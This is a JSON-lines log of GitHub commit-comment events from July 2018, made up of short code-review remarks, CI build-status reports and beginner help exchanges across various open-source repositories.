{"id":"7974031310","type":"CommitCommentEvent","actor":{"login":"sukhchainn"},"repo":{"name":"nih-at/libzip"},"payload":{"comment":{"id":29729136,"position":null,"line":null,"path":null,"commit_id":"c88f1b8a9df8b77b18b90e048eb73d1d0b60de24","created_at":"2018-07-17T02:50:06Z","updated_at":"2018-07-17T02:50:06Z","author_association":"NONE","body":"When configuring the CMake it shows error \"Incomplete files\". Please fix this!@"}},"created_at":"2018-07-17T02:50:06Z"}
{"id":"7974045256","type":"CommitCommentEvent","actor":{"login":"MasterDuke17"},"repo":{"name":"MoarVM/MoarVM"},"payload":{"comment":{"id":29729144,"position":11,"line":11,"path":"src/spesh/frame_walker.c","commit_id":"fc747c94dda6bbd549bcb9203267e90119f233c5","created_at":"2018-07-17T02:55:22Z","updated_at":"2018-07-17T02:55:22Z","author_association":"CONTRIBUTOR","body":"\"unreigster\""}},"created_at":"2018-07-17T02:55:22Z"}
{"id":"7974048869","type":"CommitCommentEvent","actor":{"login":"Ofekw"},"repo":{"name":"bichuga/ExchangeSharp"},"payload":{"comment":{"id":29729146,"position":34,"line":253,"path":"ExchangeSharp/API/Exchanges/Gdax/ExchangeGdaxAPI.cs","commit_id":"ac700da61af1ad6ec0c14bb03d814df06f6c74ae","created_at":"2018-07-17T02:56:44Z","updated_at":"2018-07-17T02:56:44Z","author_association":"COLLABORATOR","body":"?"}},"created_at":"2018-07-17T02:56:44Z"}
{"id":"7978939449","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29740116,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-17T20:00:28Z","updated_at":"2018-07-17T20:00:28Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - Win64-Windows-7-VisualStudio-14: Tests Failed (2369 of 2935 tests passed, 57 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 562 tests had: Table big diffs.\n * 76 tests had: ESO big diffs.\n * 102 tests had: AUD diffs.\n * 156 tests had: BND diffs.\n * 168 tests had: ESO small diffs.\n * 151 tests had: MDD diffs.\n * 156 tests had: MTD diffs.\n * 151 tests had: RDD diffs.\n * 36 tests had: MTR big diffs.\n * 101 tests had: MTR small diffs.\n * 22 tests had: ERR diffs.\n * 1 test had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 57\n * Failed: 566\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.72%25-red.png)</a> \n"}},"created_at":"2018-07-17T20:00:28Z"}
{"id":"7978942979","type":"CommitCommentEvent","actor":{"login":"Panzerwaffe"},"repo":{"name":"research-team/NEUCOGAR"},"payload":{"comment":{"id":29740123,"position":null,"line":null,"path":null,"commit_id":"d7636117bc9baf4f2bc718e24ab2b30537ea2ba1","created_at":"2018-07-17T20:01:07Z","updated_at":"2018-07-17T20:01:07Z","author_association":"CONTRIBUTOR","body":"```bash\r\ncmake3 -DCMAKE_INSTALL_PREFIX:PATH=/path/to/build -DPYTHON_EXECUTABLE=/shared/NEST-2.12.0/bin/python3.6 -DPYTHON_INCLUDE_DIR=/shared/NEST-2.12.0/include/python3.6m -DPYTHON_LIBRARY=/shared/NEST-2.12.0/lib/libpython3.6m.so -Dwith-mpi=/usr/mpi/gcc/openmpi-1.10.2-lsf/bin/ -DCMAKE_C_COMPILER=/shared/gcc_8/bin/gcc  -DCMAKE_CXX_COMPILER=/shared/gcc_8/bin/g++ -DMPI_C_COMPILER=/usr/mpi/gcc/openmpi-1.10.2-lsf/bin/mpicc -DMPI_CXX_COMPILER=/usr/mpi/gcc/openmpi-1.10.2-lsf/bin/mpicxx\r\n```\r\nexample of building command\r\n\r\n"}},"created_at":"2018-07-17T20:01:07Z"}
{"id":"7978945648","type":"CommitCommentEvent","actor":{"login":"storaaslia"},"repo":{"name":"storaaslia/iCross"},"payload":{"comment":{"id":29740129,"position":1,"line":1,"path":"README.md","commit_id":"7ac4a9bf0581de5b70cde3d229f3f0169d8ae23d","created_at":"2018-07-17T20:01:38Z","updated_at":"2018-07-17T20:01:38Z","author_association":"OWNER","body":"//I'm open to name  suggestions"}},"created_at":"2018-07-17T20:01:38Z"}
{"id":"7978947458","type":"CommitCommentEvent","actor":{"login":"Mornix"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29740131,"position":5,"line":75,"path":"code/Makefile","commit_id":"a25a3fae9e666ac1790479e1308e038c82fab94a","created_at":"2018-07-17T20:02:00Z","updated_at":"2018-07-17T20:02:00Z","author_association":"COLLABORATOR","body":"I tested `FORCE` in `build_exam` and while it does rebuild, it causes stack install to skip installing the binaries and thus the old builds will be used for the tests which seems to be the core of the issue. `--force-dirty` for just the install should only cause any changes to be rebuilt and reinstalled so the tests are on the latest binaries.\r\n\r\nYou may be seeing the linking which, as far as I saw in a quick scan of the docs, does occur every forced reinstall because stack is caching the object files for quick recompilation of each .hs file. The actual binary caching looks to be the installed copies which we're forcing an update to. "}},"created_at":"2018-07-17T20:02:00Z"}
{"id":"7978950394","type":"CommitCommentEvent","actor":{"login":"horwitzj"},"repo":{"name":"salesforce/mt-dynamo"},"payload":{"comment":{"id":29740139,"position":79,"line":212,"path":"src/main/java/com/salesforce/dynamodbv2/mt/mappers/sharedtable/impl/MTAmazonDynamoDBBySharedTable.java","commit_id":"66090bf9b25c008fc73fa590fa6966ad6cf559be","created_at":"2018-07-17T20:02:35Z","updated_at":"2018-07-17T20:02:35Z","author_association":"COLLABORATOR","body":"\"Multitenant\" (no hyphen): https://www.salesforce.com/styleguide/copy/style/"}},"created_at":"2018-07-17T20:02:35Z"}
{"id":"7978952438","type":"CommitCommentEvent","actor":{"login":"Rohanator9000"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29740143,"position":136,"line":240,"path":"locallib.php","commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T20:03:01Z","updated_at":"2018-07-17T20:03:01Z","author_association":"NONE","body":"I made a separate file because using Moodle's also tries to delete the meeting from the Zoom servers, and we already know that it doesn't exist there."}},"created_at":"2018-07-17T20:03:01Z"}
{"id":"7978952540","type":"CommitCommentEvent","actor":{"login":"naveegoteamcity"},"repo":{"name":"naveego/plugin-pub-csv"},"payload":{"comment":{"id":29740144,"position":null,"line":null,"path":null,"commit_id":"f94bba6b48bc55913f7c747542aeceaafe937b6d","created_at":"2018-07-17T20:03:03Z","updated_at":"2018-07-17T20:03:03Z","author_association":"NONE","body":"TeamCity Plugins :: CSV [Build 78](http://ci.n5o.green/viewLog.html?buildId=1588&buildTypeId=Plugins_Csv) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:01:36"}},"created_at":"2018-07-17T20:03:03Z"}
{"id":"7978953217","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29740148,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-17T20:03:11Z","updated_at":"2018-07-17T20:03:11Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-17T20:03:11Z"}
{"id":"7978957835","type":"CommitCommentEvent","actor":{"login":"naveegoteamcity"},"repo":{"name":"naveego/plugin-pub-csv"},"payload":{"comment":{"id":29740158,"position":null,"line":null,"path":null,"commit_id":"d85f6c43d8c8c272d1016c4dddc0ef09235466e1","created_at":"2018-07-17T20:04:08Z","updated_at":"2018-07-17T20:04:08Z","author_association":"NONE","body":"TeamCity Plugins :: CSV [Build 79](http://ci.n5o.green/viewLog.html?buildId=1589&buildTypeId=Plugins_Csv) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 137 (new)) Build time: 00:00:06"}},"created_at":"2018-07-17T20:04:08Z"}
{"id":"7978959365","type":"CommitCommentEvent","actor":{"login":"naveegoteamcity"},"repo":{"name":"naveego/plugin-pub-csv"},"payload":{"comment":{"id":29740163,"position":null,"line":null,"path":null,"commit_id":"f94bba6b48bc55913f7c747542aeceaafe937b6d","created_at":"2018-07-17T20:04:24Z","updated_at":"2018-07-17T20:04:24Z","author_association":"NONE","body":"TeamCity Plugins :: CSV [Build 80](http://ci.n5o.green/viewLog.html?buildId=1590&buildTypeId=Plugins_Csv) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:07"}},"created_at":"2018-07-17T20:04:24Z"}
{"id":"7978959460","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"robske110/SignServerStats"},"payload":{"comment":{"id":29740164,"position":null,"line":null,"path":null,"commit_id":"5487da069b8a82825e079291fa02dfb0d264111e","created_at":"2018-07-17T20:04:25Z","updated_at":"2018-07-17T20:04:25Z","author_association":"OWNER","body":"I was too early with this, apparently the PR has not yet been merged.\r\nhttps://github.com/pmmp/PocketMine-MP/pull/2284"}},"created_at":"2018-07-17T20:04:25Z"}
{"id":"7978962130","type":"CommitCommentEvent","actor":{"login":"saily"},"repo":{"name":"antaflos/sphinxcontrib-images"},"payload":{"comment":{"id":29740167,"position":null,"line":null,"path":null,"commit_id":"8ebee676ce4489da7851cc089cc30fad650913ce","created_at":"2018-07-17T20:04:54Z","updated_at":"2018-07-17T20:04:54Z","author_association":"NONE","body":"Could you please file a pull request to https://github.com/spinus/sphinxcontrib-images so we can fix https://github.com/spinus/sphinxcontrib-images/issues/46?"}},"created_at":"2018-07-17T20:04:54Z"}
{"id":"7978962688","type":"CommitCommentEvent","actor":{"login":"melissamas"},"repo":{"name":"1millionwomentotech/toolkitten"},"payload":{"comment":{"id":29740168,"position":null,"line":null,"path":null,"commit_id":"1a12f041f1de0fdc85919d021b663eabc13345c2","created_at":"2018-07-17T20:05:01Z","updated_at":"2018-07-17T20:05:01Z","author_association":"NONE","body":"I attempted what you suggested an I am getting the same message. Is it possible I did not properly ave the program correctly in the writer? I did save it as calc.py with print (1+2) written into it. I am wondering if I need to create a new document in sublime text. Would any programs or settings keep the two from communicating with each other? I have python (installed per instructions) sublime text and command console currently open. "}},"created_at":"2018-07-17T20:05:01Z"}
{"id":"7978964350","type":"CommitCommentEvent","actor":{"login":"zaaraameera2014"},"repo":{"name":"aosp-mirror/platform_frameworks_base"},"payload":{"comment":{"id":29740173,"position":11,"line":62,"path":"telephony/java/android/telephony/NetworkRegistrationState.java","commit_id":"c51397b161a41c967d7ac83ef8804fd13f78a0ad","created_at":"2018-07-17T20:05:20Z","updated_at":"2018-07-17T20:05:20Z","author_association":"NONE","body":"U mobile"}},"created_at":"2018-07-17T20:05:20Z"}
{"id":"7978965450","type":"CommitCommentEvent","actor":{"login":"rlorenzo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29740176,"position":364,"line":276,"path":"classes/webservice.php","commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T20:05:32Z","updated_at":"2018-07-17T20:05:32Z","author_association":"MEMBER","body":"@Rohanator9000 If we are not enabling recycling of licenses then the check for $this->_config->utmost should be done first so we avoid making any unnecessary web service calls."}},"created_at":"2018-07-17T20:05:32Z"}
{"id":"7978965631","type":"CommitCommentEvent","actor":{"login":"MarceloProjetos"},"repo":{"name":"letscontrolit/ESPEasy"},"payload":{"comment":{"id":29740177,"position":null,"line":null,"path":null,"commit_id":"787c1c6c39d42baf7bdfc44415b0a3b4d02e31bd","created_at":"2018-07-17T20:05:35Z","updated_at":"2018-07-17T20:05:35Z","author_association":"NONE","body":"I did not understand how to use it.\r\nDo you have any examples?"}},"created_at":"2018-07-17T20:05:35Z"}
{"id":"7978967469","type":"CommitCommentEvent","actor":{"login":"shadowwalkersb"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29740180,"position":null,"line":null,"path":null,"commit_id":"a6519991c11b9fb2ae30229fcdc4fba9aededdb0","created_at":"2018-07-17T20:05:55Z","updated_at":"2018-07-17T20:05:55Z","author_association":"MEMBER","body":"Oh, this is already in master? This commit seems to have broken Appveyor tests. Can we revert until either the tests or the code is actually fixed?"}},"created_at":"2018-07-17T20:05:55Z"}
{"id":"7978968948","type":"CommitCommentEvent","actor":{"login":"sutapa9000"},"repo":{"name":"1millionwomentotech/toolkitten"},"payload":{"comment":{"id":29740184,"position":null,"line":null,"path":null,"commit_id":"1a12f041f1de0fdc85919d021b663eabc13345c2","created_at":"2018-07-17T20:06:13Z","updated_at":"2018-07-17T20:06:13Z","author_association":"NONE","body":"@melissamas  Can you first check if you are able to do the following and check if the PATH variable has the path to the python folder.\r\nCheck the link below for more pictures and detailed information.\r\nhttps://www.pythoncentral.io/add-python-to-path-python-is-not-recognized-as-an-internal-or-external-command/\r\nIf it does not work, please feel free to PM me on facebook and we can share screen and help you out."}},"created_at":"2018-07-17T20:06:13Z"}
{"id":"7978969543","type":"CommitCommentEvent","actor":{"login":"zaaraameera2014"},"repo":{"name":"aosp-mirror/platform_frameworks_base"},"payload":{"comment":{"id":29740185,"position":10,"line":61,"path":"telephony/java/android/telephony/NetworkRegistrationState.java","commit_id":"c51397b161a41c967d7ac83ef8804fd13f78a0ad","created_at":"2018-07-17T20:06:20Z","updated_at":"2018-07-17T20:06:20Z","author_association":"NONE","body":"U mobile malaysiA"}},"created_at":"2018-07-17T20:06:20Z"}
{"id":"7978971824","type":"CommitCommentEvent","actor":{"login":"naveegoteamcity"},"repo":{"name":"naveego/plugin-pub-csv"},"payload":{"comment":{"id":29740192,"position":null,"line":null,"path":null,"commit_id":"f94bba6b48bc55913f7c747542aeceaafe937b6d","created_at":"2018-07-17T20:06:49Z","updated_at":"2018-07-17T20:06:49Z","author_association":"NONE","body":"TeamCity Plugins :: CSV [Build 81](http://ci.n5o.green/viewLog.html?buildId=1591&buildTypeId=Plugins_Csv) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:07"}},"created_at":"2018-07-17T20:06:49Z"}
{"id":"7978971848","type":"CommitCommentEvent","actor":{"login":"Rohanator9000"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29740193,"position":6,"line":70,"path":"lang/en/zoom.php","commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T20:06:49Z","updated_at":"2018-07-17T20:06:49Z","author_association":"NONE","body":"No, I removed it."}},"created_at":"2018-07-17T20:06:49Z"}
{"id":"7978972896","type":"CommitCommentEvent","actor":{"login":"rlorenzo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29740195,"position":567,"line":392,"path":"classes/webservice.php","commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T20:07:02Z","updated_at":"2018-07-17T20:07:02Z","author_association":"MEMBER","body":"@Rohanator9000 Why do we need to call active_paid_user_exists()? Aren't there always going to be paid users?... If we need it then we should check to see if we are recycling licenses. If not, then don't do additional web service calls."}},"created_at":"2018-07-17T20:07:02Z"}
{"id":"7978978123","type":"CommitCommentEvent","actor":{"login":"rui314"},"repo":{"name":"ShinyaKato/seccamp2018"},"payload":{"comment":{"id":29740217,"position":17,"line":462,"path":"parse.c","commit_id":"1c7861cabc143887a4bd5031f42083e75b7c3f18","created_at":"2018-07-17T20:08:04Z","updated_at":"2018-07-17T20:08:04Z","author_association":"NONE","body":"次のトークンが期待しているものであれば読み進め、そうでなければエラーで終了する、というのは関数にまとめるといいかも。expect_token(tokentype, char *msg)みたいな。\"tPAREN expected\"というメッセージはあまりユーザフレンドリではないので\"'(' expected\"とかのほうがよくないですかね。だとすればexpect_token(tLPAREN, \"(\")みたいな。"}},"created_at":"2018-07-17T20:08:04Z"}
{"id":"7978982427","type":"CommitCommentEvent","actor":{"login":"rlorenzo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29740224,"position":204,"line":189,"path":"classes/webservice.php","commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T20:08:57Z","updated_at":"2018-07-17T20:08:57Z","author_association":"MEMBER","body":"@Rohanator9000 Can we have this magic number be defined with a constant so we know what this number means?"}},"created_at":"2018-07-17T20:08:57Z"}
{"id":"7978982708","type":"CommitCommentEvent","actor":{"login":"FreddieWitherden"},"repo":{"name":"vincentlab/PyFR"},"payload":{"comment":{"id":29740226,"position":4,"line":7,"path":"pyfr/solvers/aceuler/elements.py","commit_id":"1501f3ed254317555f7363efeabb3365820d51ff","created_at":"2018-07-17T20:09:00Z","updated_at":"2018-07-17T20:09:00Z","author_association":"MEMBER","body":"Don't we still want this here?"}},"created_at":"2018-07-17T20:09:00Z"}
{"id":"7978983182","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29740228,"position":null,"line":null,"path":null,"commit_id":"2d22cc9ad28f7e4976fb67b45054a872b600c33e","created_at":"2018-07-17T20:09:07Z","updated_at":"2018-07-17T20:09:07Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/89cfd5cecc6c52b7469eb17a5b7d96348294fe6e/.circleci/config.yml)\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/2d22cc9ad28f7e4976fb67b45054a872b600c33e/scripts/deploy-multidev.sh)\n"}},"created_at":"2018-07-17T20:09:07Z"}
{"id":"7978983843","type":"CommitCommentEvent","actor":{"login":"dyusuf"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29740233,"position":3,"line":5,"path":"ccr5_ccl5_il10ra.cypher","commit_id":"ac221f3892e96d648efdc796d038f6fb3bf9be0a","created_at":"2018-07-17T20:09:15Z","updated_at":"2018-07-17T20:09:15Z","author_association":"COLLABORATOR","body":"re. my question related to ccr5:Protein, why add ccr5? \r\n\r\nI found code (ccr5)-[:IN]->(ccl5_ccr5_activation) to define relation.\r\n\r\nso this is a variable name which is required. now I understand"}},"created_at":"2018-07-17T20:09:15Z"}
{"id":"7978984965","type":"CommitCommentEvent","actor":{"login":"rui314"},"repo":{"name":"ShinyaKato/seccamp2018"},"payload":{"comment":{"id":29740234,"position":33,"line":478,"path":"parse.c","commit_id":"1c7861cabc143887a4bd5031f42083e75b7c3f18","created_at":"2018-07-17T20:09:29Z","updated_at":"2018-07-17T20:09:29Z","author_association":"NONE","body":"新しくアロケートしたオブジェクトはとりあえずmemsetでゼロクリアするのをおすすめします。そうするとこういう初期化はしなくてすむようになるので。それに多分バグりにくくなる。"}},"created_at":"2018-07-17T20:09:29Z"}
{"id":"7978985207","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/cmake-feedstock"},"payload":{"comment":{"id":29740236,"position":null,"line":null,"path":null,"commit_id":"164e46055484db73a0a6d71840abb8133635de94","created_at":"2018-07-17T20:09:32Z","updated_at":"2018-07-17T20:09:32Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @marcelotrevisani were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-17T20:09:32Z"}
{"id":"7978986550","type":"CommitCommentEvent","actor":{"login":"cybrnook"},"repo":{"name":"jlesage/docker-handbrake"},"payload":{"comment":{"id":29740238,"position":null,"line":null,"path":null,"commit_id":"ae62b67bbeb171c5fe110c320f389b8165ced335","created_at":"2018-07-17T20:09:49Z","updated_at":"2018-07-17T20:09:49Z","author_association":"NONE","body":"Very nice!"}},"created_at":"2018-07-17T20:09:49Z"}
{"id":"7978989208","type":"CommitCommentEvent","actor":{"login":"sutapa9000"},"repo":{"name":"1millionwomentotech/toolkitten"},"payload":{"comment":{"id":29740243,"position":null,"line":null,"path":null,"commit_id":"1a12f041f1de0fdc85919d021b663eabc13345c2","created_at":"2018-07-17T20:10:23Z","updated_at":"2018-07-17T20:10:23Z","author_association":"NONE","body":"@melissamas I am not sure if its ok..but if you email me gmail(sutapa9000@gmail.com.)...or PM me on facebook we can share screen and help you out."}},"created_at":"2018-07-17T20:10:23Z"}
{"id":"7978990087","type":"CommitCommentEvent","actor":{"login":"Gustry"},"repo":{"name":"RemiDesgrange/db-style-manager"},"payload":{"comment":{"id":29740246,"position":10,"line":27,"path":"plugin.py","commit_id":"105f308948b5a28e9d996740c38eccdb5f704b04","created_at":"2018-07-17T20:10:33Z","updated_at":"2018-07-17T20:10:33Z","author_association":"NONE","body":"Don't update these lines. `qgis.PyQt` is already picking the good Qt version according to QGIS Version"}},"created_at":"2018-07-17T20:10:33Z"}
{"id":"7978992028","type":"CommitCommentEvent","actor":{"login":"rlorenzo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29740252,"position":257,"line":216,"path":"classes/webservice.php","commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T20:10:59Z","updated_at":"2018-07-17T20:10:59Z","author_association":"MEMBER","body":"@Rohanator9000 If this is going to be called more than once in a session, and it seems like it would if we have recycle license enabled, it should be cached as a static variable."}},"created_at":"2018-07-17T20:10:59Z"}
{"id":"7978995552","type":"CommitCommentEvent","actor":{"login":"Rexagon"},"repo":{"name":"Rexagon/moysklad-courier"},"payload":{"comment":{"id":29740262,"position":null,"line":null,"path":null,"commit_id":"cfa26cd67a8572d05f06dde146557b2c04262acd","created_at":"2018-07-17T20:11:45Z","updated_at":"2018-07-17T20:11:45Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Добавить колонку со порядковым номером и цветовым статусом слева в общем списке заказов.](https://trello.com/c/0gizGOcU/1-%D0%B4%D0%BE%D0%B1%D0%B0%D0%B2%D0%B8%D1%82%D1%8C-%D0%BA%D0%BE%D0%BB%D0%BE%D0%BD%D0%BA%D1%83-%D1%81%D0%BE-%D0%BF%D0%BE%D1%80%D1%8F%D0%B4%D0%BA%D0%BE%D0%B2%D1%8B%D0%BC-%D0%BD%D0%BE%D0%BC%D0%B5%D1%80%D0%BE%D0%BC-%D0%B8-%D1%86%D0%B2%D0%B5%D1%82%D0%BE%D0%B2%D1%8B%D0%BC-%D1%81%D1%82%D0%B0%D1%82%D1%83%D1%81%D0%BE%D0%BC-%D1%81%D0%BB%D0%B5%D0%B2%D0%B0-%D0%B2-%D0%BE%D0%B1%D1%89%D0%B5%D0%BC-%D1%81%D0%BF%D0%B8%D1%81%D0%BA%D0%B5-%D0%B7%D0%B0%D0%BA%D0%B0%D0%B7%D0%BE%D0%B2)"}},"created_at":"2018-07-17T20:11:45Z"}
{"id":"7978999408","type":"CommitCommentEvent","actor":{"login":"mobilestrike-discorderver"},"repo":{"name":"mobilestrike-discorderver/MobileStrike.DiscordSever"},"payload":{"comment":{"id":29740271,"position":null,"line":null,"path":null,"commit_id":"31882793c10596fcc0d6db41c80aa5157635b563","created_at":"2018-07-17T20:12:34Z","updated_at":"2018-07-17T20:12:34Z","author_association":"OWNER","body":"Sup"}},"created_at":"2018-07-17T20:12:34Z"}
{"id":"7978999590","type":"CommitCommentEvent","actor":{"login":"RoshanPawara"},"repo":{"name":"RoshanPawara/Nature-of-Code"},"payload":{"comment":{"id":29740272,"position":null,"line":null,"path":null,"commit_id":"07685a8b37254707a5a38b55cda3aede305db565","created_at":"2018-07-17T20:12:35Z","updated_at":"2018-07-17T20:12:35Z","author_association":"OWNER","body":"Usage of Random class and nextGaussian() function.\r\n"}},"created_at":"2018-07-17T20:12:35Z"}
{"id":"7979000031","type":"CommitCommentEvent","actor":{"login":"omar-dev"},"repo":{"name":"wix/react-native-navigation"},"payload":{"comment":{"id":29740274,"position":null,"line":null,"path":null,"commit_id":"d75ff65bac702f8b143ff00275699c07ab095a01","created_at":"2018-07-17T20:12:40Z","updated_at":"2018-07-17T20:12:40Z","author_association":"NONE","body":"this commit breaks showing multiple overlays at the same time."}},"created_at":"2018-07-17T20:12:40Z"}
{"id":"7979001578","type":"CommitCommentEvent","actor":{"login":"bengreenow"},"repo":{"name":"bengreenow/HASKELL"},"payload":{"comment":{"id":29740276,"position":null,"line":null,"path":null,"commit_id":"ed4f6e89af29f26bba16eba7a0ccf8662ef01317","created_at":"2018-07-17T20:12:59Z","updated_at":"2018-07-17T20:12:59Z","author_association":"OWNER","body":"This is very broken, with many answers lost. Will fix soon"}},"created_at":"2018-07-17T20:12:59Z"}
{"id":"7979006191","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29740294,"position":null,"line":null,"path":null,"commit_id":"03f681a69a86ef887243ffefb5d021a00c46af53","created_at":"2018-07-17T20:13:53Z","updated_at":"2018-07-17T20:13:53Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-50](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-50).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-50-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-17T20:13:53Z"}
{"id":"7979007539","type":"CommitCommentEvent","actor":{"login":"temrich"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29740299,"position":190,"line":190,"path":"mlmodelinterpreter/MLModelInterpreterExampleObjC/ViewController.m","commit_id":"aa0fa634c7f80529c68c8b29425ec01828189530","created_at":"2018-07-17T20:14:09Z","updated_at":"2018-07-17T20:14:09Z","author_association":"NONE","body":"remove extra indentation"}},"created_at":"2018-07-17T20:14:09Z"}
{"id":"7979008090","type":"CommitCommentEvent","actor":{"login":"rlorenzo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29740300,"position":9,"line":49,"path":"mod_form.php","commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T20:14:15Z","updated_at":"2018-07-17T20:14:15Z","author_association":"MEMBER","body":"@Rohanator9000 If user is not found.. this is going to fail silently right? It should display the error message: https://github.com/ucla/moodle-mod_zoom/blob/master/lang/en/zoom.php#L123"}},"created_at":"2018-07-17T20:14:15Z"}
{"id":"7979008827","type":"CommitCommentEvent","actor":{"login":"temrich"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29740302,"position":211,"line":211,"path":"mlmodelinterpreter/MLModelInterpreterExampleObjC/ViewController.m","commit_id":"aa0fa634c7f80529c68c8b29425ec01828189530","created_at":"2018-07-17T20:14:25Z","updated_at":"2018-07-17T20:14:25Z","author_association":"NONE","body":"remove extra indentation"}},"created_at":"2018-07-17T20:14:25Z"}
{"id":"7979009212","type":"CommitCommentEvent","actor":{"login":"jrchamp"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29740304,"position":207,"line":192,"path":"classes/webservice.php","commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T20:14:30Z","updated_at":"2018-07-17T20:14:30Z","author_association":"NONE","body":"``uniqid()`` is very predictable. If we want something a bit more random, consider: ``base64_encode(random_bytes(16))``"}},"created_at":"2018-07-17T20:14:30Z"}
{"id":"7979010017","type":"CommitCommentEvent","actor":{"login":"ivmai"},"repo":{"name":"Unity-Technologies/bdwgc"},"payload":{"comment":{"id":29740309,"position":null,"line":null,"path":null,"commit_id":"a8ddb045cfe203516362319715f333f97ede470d","created_at":"2018-07-17T20:14:39Z","updated_at":"2018-07-17T20:14:39Z","author_association":"NONE","body":"\nNot needed if your compiler supports GCC atomic primitives. E.g. gcc-5 and clang-4.0 do. MS VC++ does not, I think (I haven't checked it).\nIn general, configure uses test_atomic_ops to decide whether libatomic_ops needed or not.\nвторник, 17 июля 2018г., 22:08 +03:00 от Jonathan Chambers  notifications@github.com :\n\n>@ivmai should libatomic_ops no longer be needed?\n>—\n>You are receiving this because you were mentioned.\n>Reply to this email directly,  view it on GitHub , or  mute the thread ."}},"created_at":"2018-07-17T20:14:39Z"}
{"id":"7979010161","type":"CommitCommentEvent","actor":{"login":"temrich"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29740310,"position":223,"line":223,"path":"mlmodelinterpreter/MLModelInterpreterExampleObjC/ViewController.m","commit_id":"aa0fa634c7f80529c68c8b29425ec01828189530","created_at":"2018-07-17T20:14:40Z","updated_at":"2018-07-17T20:14:40Z","author_association":"NONE","body":"indent two spaces"}},"created_at":"2018-07-17T20:14:40Z"}
